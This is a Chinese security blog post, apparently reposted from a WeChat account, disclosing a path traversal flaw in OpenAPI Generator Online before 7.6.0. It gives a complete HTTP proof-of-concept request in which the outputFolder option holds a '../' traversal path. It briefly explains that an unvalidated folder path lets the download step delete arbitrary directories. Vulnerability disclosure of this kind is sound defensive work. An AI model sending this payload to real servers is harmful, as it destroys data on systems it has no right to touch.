OpenAPI Generator Online<7.6.0 存在路径遍历漏洞

admin 2024年5月31日13:18:09评论30 views字数 998阅读3分19秒阅读模式
POST http://127.0.0.1:8080/api/gen/clients/ruby HTTP/1.1Host: 127.0.0.1:8080User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0Accept: */*Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateReferer: http://127.0.0.1:8080/index.htmlContent-Type: application/jsonContent-Length: 238Origin: http://127.0.0.1:8080Connection: closeCookie: wp-settings-time-1=1710311630; OFBiz.Visitor=10001Sec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-originPriority: u=1{  "openAPIUrl": "https://raw.githubusercontent.com/OpenAPITools/openapi-generator/master/modules/openapi-generator/src/test/resources/2_0/petstore.yaml",  "options": {"outputFolder":"../../../../../../../../tmp/12345/"},  "spec": {}}

OpenAPI Generator Online<7.6.0 存在路径遍历漏洞

简单分析

下载文件根据fileid下载,然后会有一个FileUtils.deleteDirectory(file.getParentFile());的操作

OpenAPI Generator Online<7.6.0 存在路径遍历漏洞

Options的outputFolder字段会保存文件的路径。后续下载的时候会去取出来最后做删除 由于没有对outputFolder限制 导致了会删除任意的目录

OpenAPI Generator Online<7.6.0 存在路径遍历漏洞

这里需要一个能生成代码下载的地方,从api上看有两个地方

OpenAPI Generator Online<7.6.0 存在路径遍历漏洞

原文始发于微信公众号(e0m安全屋):OpenAPI Generator Online<7.6.0 存在路径遍历漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年5月31日13:18:09
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   OpenAPI Generator Online<7.6.0 存在路径遍历漏洞http://cn-sec.com/archives/2799289.html

发表评论

匿名网友 填写信息